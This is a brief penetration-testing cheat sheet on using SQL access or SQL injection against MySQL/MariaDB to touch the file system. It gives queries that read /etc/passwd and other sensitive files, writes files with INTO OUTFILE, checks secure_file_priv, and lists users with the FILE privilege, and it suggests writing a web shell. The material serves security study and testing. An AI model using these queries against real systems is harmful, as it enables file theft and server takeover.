Database Exploitation: File system
If we are able to run SQL queries, either from a direct access, or from a SQLi, we may be able to read/write files.
Common usages are:
- π Read sensitive files (configuration files, /etc/passwd, etc.)
- πͺ² Write a web shell (you need the webserver root path, try to see if it's shown if error messages if any, or try well-known paths)
In the context of a SQLi, you can use sqlmap to automate this.
To read a file:
SELECT LOAD_FILE('/etc/passwd');
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE xxx;
To write something to a file (β οΈ query length limit):
SELECT [...] INTO OUTFILE '/path/to/writable/dir/myfile';
SELECT "Hello!" INTO OUTFILE '/tmp/myfile';
SELECT FROM_BASE64("SGVsbG8h") INTO OUTFILE '/tmp/myfile';
DBMS Introspection
MySQL secure_file_priv
MySQL uses the secure_file_priv
. If it's empty, there is no restriction. If NULL
, read/write are disabled. Otherwise, we are limited to the specified folder. We can check out the current value with:
SELECT variable_value FROM information_schema.global_variables
WHERE VARIABLE_NAME='secure_file_priv'
MariaDB has this variable set to empty by default. MySQL uses /var/lib/mysql-files
as the default folder.
List Users That Can Manipulation Files
List users with the file permission (Y=YES)
SELECT grantee, privilege_type
FROM information_schema.user_privileges
WHERE PRIVILEGE_TYPE = 'FILE'
SELECT user,File_priv FROM mysql.user